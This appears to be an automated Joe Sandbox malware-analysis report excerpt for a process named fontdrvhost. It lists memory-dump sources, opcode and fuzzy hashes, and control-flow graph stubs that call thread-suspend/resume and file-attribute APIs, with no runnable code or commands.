                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c56eccfc656b8e973dfc67861853442708201ba9d4e3ef66baeb3f02ebe4ac94
                                                                    • Instruction ID: 570d6c1dc3c992c8fcd4e898c968a8b447244bd2eff2fd71d823361f9a7952e6
                                                                    • Opcode Fuzzy Hash: c56eccfc656b8e973dfc67861853442708201ba9d4e3ef66baeb3f02ebe4ac94
                                                                    • Instruction Fuzzy Hash: BF01407090968DCFCB85DF58C8546A97BF1FF29300F05019AD419C71A2D7749954CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA28000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA28000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba28000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ebcea49ff4b3e6edb30eee7e05d543372c2ab0872856939891abeaeda2977d38
                                                                    • Instruction ID: b6e73b6fdc8098d430be3702b30a3797c336937493a537601d5e23ca64c19f1d
                                                                    • Opcode Fuzzy Hash: ebcea49ff4b3e6edb30eee7e05d543372c2ab0872856939891abeaeda2977d38
                                                                    • Instruction Fuzzy Hash: 1E014B7191964C8FDB45EF28C8515E93BB0FF68315F5502AAF848C32A1D734EA54CB82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 42d3b6ed7f4e3fad1448092a12e9e1d2f902d49054b62a887fef3d4fe4a84dec
                                                                    • Instruction ID: caebe633962a5995de6a0fc2a50f5a76f71572231a8a93e7687a6f363351e80b
                                                                    • Opcode Fuzzy Hash: 42d3b6ed7f4e3fad1448092a12e9e1d2f902d49054b62a887fef3d4fe4a84dec
                                                                    • Instruction Fuzzy Hash: 1401713090968C8FCF85EF64C864AA97FB0FF25301F4500DAE449C71A2D7749554CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d270dc113d78e9273dfcfac49c9c53d425031652d20ec328e71bed7fad7cf92a
                                                                    • Instruction ID: 0705b21b7f68318af5cc571442d3da8ecdc1a2e1e68e8fa14bc878af3ad91016
                                                                    • Opcode Fuzzy Hash: d270dc113d78e9273dfcfac49c9c53d425031652d20ec328e71bed7fad7cf92a
                                                                    • Instruction Fuzzy Hash: C5015A70A08A8D8FDF85EF68C868AA97BF0FF29300F0504ABD418C71A2DB749954CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 70dc49173dc0a3a70aed1f94c8f5900603e8d7ed6a03485770723b10bb6c8a3c
                                                                    • Instruction ID: e98dfdd03e503cbdbd3d3d89ee69e4b7ec4802941ea7f45f99a1035bcbb45612
                                                                    • Opcode Fuzzy Hash: 70dc49173dc0a3a70aed1f94c8f5900603e8d7ed6a03485770723b10bb6c8a3c
                                                                    • Instruction Fuzzy Hash: 17014F7190968C8FCB95DF64C894ADD7FB0FF65300F0501DAE459C71A1D775A954CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5409642b23cddce5fcf2e22ada1a9ed551b93d3d1424217aabefa28ed75f1eff
                                                                    • Instruction ID: ba57752d3b8a9586a8815e42712b1fcf59f3e1d3860187a6ab185201575ff11a
                                                                    • Opcode Fuzzy Hash: 5409642b23cddce5fcf2e22ada1a9ed551b93d3d1424217aabefa28ed75f1eff
                                                                    • Instruction Fuzzy Hash: 7601A27190968C8FCB85DF54C894AE97FB0FF69300F0500DAE409C71A1D7749A94CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba2b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3750f98b5c0c7e730ff496b1ffe6793dff22d2e8a178991ca7e0eac30b64eb47
                                                                    • Instruction ID: 0a4998cd1825820a9391cd3dc146169900a15715636d504fd2521edb071ad27e
                                                                    • Opcode Fuzzy Hash: 3750f98b5c0c7e730ff496b1ffe6793dff22d2e8a178991ca7e0eac30b64eb47
                                                                    • Instruction Fuzzy Hash: BE01C030D0834D8FEB54DF95C8585ED7BB1EF15310F14427EC425972A6DA74A906CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5d4821acd004ab0f26a3d402a890dc5bc79c4a76cbd1ee3ca0d877cf75bbbf21
                                                                    • Instruction ID: ced90b726cad40df2ce242704e9e399a4239e2b285292b491022b3179ae1c59e
                                                                    • Opcode Fuzzy Hash: 5d4821acd004ab0f26a3d402a890dc5bc79c4a76cbd1ee3ca0d877cf75bbbf21
                                                                    • Instruction Fuzzy Hash: 8F018F7190968DCFCB85DF64C8546ED7BB0FF25300F05019AD418C71A2DB349A44CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 059c80b4286a8817d294a938abd6267fc214bcd4e0de39cd9e0dae5e0dbfc6ff
                                                                    • Instruction ID: 8a8055ffafffb87d5cdc717c6477f2a6d896f2741798a68acc392bbd861ad726
                                                                    • Opcode Fuzzy Hash: 059c80b4286a8817d294a938abd6267fc214bcd4e0de39cd9e0dae5e0dbfc6ff
                                                                    • Instruction Fuzzy Hash: 42018F7090868C8FCB85DF24C868A997FF0FF55300F0500EAD409C71A2D7759954CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a0cc7ec3369932692ccbebbf2e2a164ca6e70588988d0f8c1d2ecd4afb9c0e84
                                                                    • Instruction ID: b4a06f232a46bfffff5914f0eed6687c54de7d1ab6484895218d4f00a1e53c2b
                                                                    • Opcode Fuzzy Hash: a0cc7ec3369932692ccbebbf2e2a164ca6e70588988d0f8c1d2ecd4afb9c0e84
                                                                    • Instruction Fuzzy Hash: 66F0EC30914A4D9FDF44EF58C859AE97BF0FB68305F00456AA85DD3250DB30A694CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba10000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a09f50adfc75588805bbaef93122d5fe615db1cfee41c67bffdc149ca2585e8f
                                                                    • Instruction ID: 0f970cd56a5f25fdb1300ff3c64a6a0ecdcdfc0bfa7b2b52f70ce09caf473c1c
                                                                    • Opcode Fuzzy Hash: a09f50adfc75588805bbaef93122d5fe615db1cfee41c67bffdc149ca2585e8f
                                                                    • Instruction Fuzzy Hash: 7D012930A0555E8FEBB4EB18C8987F9B3B1EF54302F1082F6D41DA2299DA742E81CF44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 824ae1838e332e8b5cd7f8c154ad94833c5e9d00e0a300b0e8f9b7db70a70a0c
                                                                    • Instruction ID: 7a70b6367e02ad908ee74ddb566512640904efa81408c1221debc5bede65459b
                                                                    • Opcode Fuzzy Hash: 824ae1838e332e8b5cd7f8c154ad94833c5e9d00e0a300b0e8f9b7db70a70a0c
                                                                    • Instruction Fuzzy Hash: CDF0BD3091490D9FDF84EF68C498AAA7BF1FB68305F50419AA41DD32A0DB719694CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA28000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA28000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba28000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 04f7f83a68e4f50346af384cc2447061e9f89d51487e5dd1ab1445e338f01b89
                                                                    • Instruction ID: 2474b71bcb26ec5a54b8083109143fc3132b77f1efb3859a458b7ae5bad5a55b
                                                                    • Opcode Fuzzy Hash: 04f7f83a68e4f50346af384cc2447061e9f89d51487e5dd1ab1445e338f01b89
                                                                    • Instruction Fuzzy Hash: 95F09A3090968DCFCB94EF18C8A5ADA3BE0FF28300F0501A6E858C7162D774E9A0CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 880677bd27ec95036ed7989b8e529f777f18915092ec2a662d2ea627fcb28cd8
                                                                    • Instruction ID: 47842fc4b72e1ded867ffe1289f465ed7e016a10776dab215a5e9bd5056aa0e6
                                                                    • Opcode Fuzzy Hash: 880677bd27ec95036ed7989b8e529f777f18915092ec2a662d2ea627fcb28cd8
                                                                    • Instruction Fuzzy Hash: 5EF0BD70914A4D9FDF94EF54C454AEA7BB0FF58305F1041AAE41DD3260DB71A694CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 298e9034b8cc6826a9079cf4814ab5b5f40cc6dfe2988624cfed520e4d5e1f1f
                                                                    • Instruction ID: 1afad90637a74c26745a875a92f8b922dff26f1b7999b700c4195162c58be19d
                                                                    • Opcode Fuzzy Hash: 298e9034b8cc6826a9079cf4814ab5b5f40cc6dfe2988624cfed520e4d5e1f1f
                                                                    • Instruction Fuzzy Hash: 99F01D7090490D9FCF94EF54C494AAA7BF0FF68304F1140AAE41DD3260DB71A690CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba2b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cfa1dcafff2f0d16f4cf50fd4296eb32325cf09fc6c0d0a9c7ea0180b71b0917
                                                                    • Instruction ID: 44fd8e382d1352a1c4a279db0f8fce6a33b31adecb0d18acac3fea726eef7fce
                                                                    • Opcode Fuzzy Hash: cfa1dcafff2f0d16f4cf50fd4296eb32325cf09fc6c0d0a9c7ea0180b71b0917
                                                                    • Instruction Fuzzy Hash: ABF01270D4E21D8EEB70DBF584542FCBAF0AF15301F31057AD00A931A7D67896448F00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5ffe8383090676719d9fa534f0561d664ce99d0014e011123dc6a56bdc51229e
                                                                    • Instruction ID: 0ed4c333f376ecc8475e96671c7002fcc5b567101b123b2d2ee726c4f41e5bec
                                                                    • Opcode Fuzzy Hash: 5ffe8383090676719d9fa534f0561d664ce99d0014e011123dc6a56bdc51229e
                                                                    • Instruction Fuzzy Hash: 45E0927190484DDFDF50DF98D886ADD3BB0FF10700F404065F508D7161DA34E5508780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba2b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba2b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba10000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:4.7%
                                                                    Dynamic/Decrypted Code Coverage:83.3%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:12
                                                                    Total number of Limit Nodes:0
                                                                    execution_graph 24284 7ffd9bbe02f9 24285 7ffd9bbe0307 FindCloseChangeNotification 24284->24285 24287 7ffd9bbe03e4 24285->24287 24288 7ffd9bbe1f85 24289 7ffd9bbe1f9f GetFileAttributesW 24288->24289 24291 7ffd9bbe2065 24289->24291 24276 7ffd9bbdeaad 24277 7ffd9bbdeabb SuspendThread 24276->24277 24279 7ffd9bbdeb94 24277->24279 24280 7ffd9bbe01df 24281 7ffd9bbe0212 ResumeThread 24280->24281 24283 7ffd9bbe02a4 24281->24283

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 814 7ffd9ba20da8-7ffd9ba20dbf 815 7ffd9ba20dc2-7ffd9ba20df9 814->815 816 7ffd9ba20dc1 814->816 818 7ffd9ba20e00-7ffd9ba20eb7 call 7ffd9ba207d0 815->818 819 7ffd9ba20dfb 815->819 816->815 832 7ffd9ba20ecf-7ffd9ba20fa8 818->832 833 7ffd9ba20eb9-7ffd9ba20ece 818->833 819->818 846 7ffd9ba20fc0-7ffd9ba20fc1 832->846 847 7ffd9ba20faa-7ffd9ba20fb0 832->847 833->832 848 7ffd9ba20fb2 846->848 849 7ffd9ba20fc3-7ffd9ba20fc9 846->849 847->848 850 7ffd9ba20fb4-7ffd9ba20fbe 848->850 851 7ffd9ba20fcc-7ffd9ba20fe3 848->851 849->851 850->846 854 7ffd9ba20feb-7ffd9ba210dc 851->854
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: c9$!k9
                                                                    • API String ID: 0-3254877420
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1855998458.00007FFD9BBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9bbd0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID: ChangeCloseFindNotification
                                                                    • String ID:
                                                                    • API String ID: 2591292051-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 18 7ffd9bbdeaad-7ffd9bbdeab9 19 7ffd9bbdeabb-7ffd9bbdeac3 18->19 20 7ffd9bbdeac4-7ffd9bbdeb92 SuspendThread 18->20 19->20 24 7ffd9bbdeb9a-7ffd9bbdebe4 20->24 25 7ffd9bbdeb94 20->25 25->24
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1855998458.00007FFD9BBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9bbd0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID: SuspendThread
                                                                    • String ID:
                                                                    • API String ID: 3178671153-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 28 7ffd9bbe1f85-7ffd9bbe2063 GetFileAttributesW 32 7ffd9bbe206b-7ffd9bbe20a9 28->32 33 7ffd9bbe2065 28->33 33->32
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1855998458.00007FFD9BBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9bbd0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 35 7ffd9bbe01df-7ffd9bbe02a2 ResumeThread 38 7ffd9bbe02aa-7ffd9bbe02f4 35->38 39 7ffd9bbe02a4 35->39 39->38
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1855998458.00007FFD9BBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9bbd0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 78 7ffd9ba216d3-7ffd9ba3fad5 84 7ffd9ba3fad7 78->84 85 7ffd9ba3fadc-7ffd9ba3fae1 call 7ffd9ba216e0 78->85 84->85 87 7ffd9ba3fae6-7ffd9ba3faf1 85->87
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -L_^
                                                                    • API String ID: 0-3144474931
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
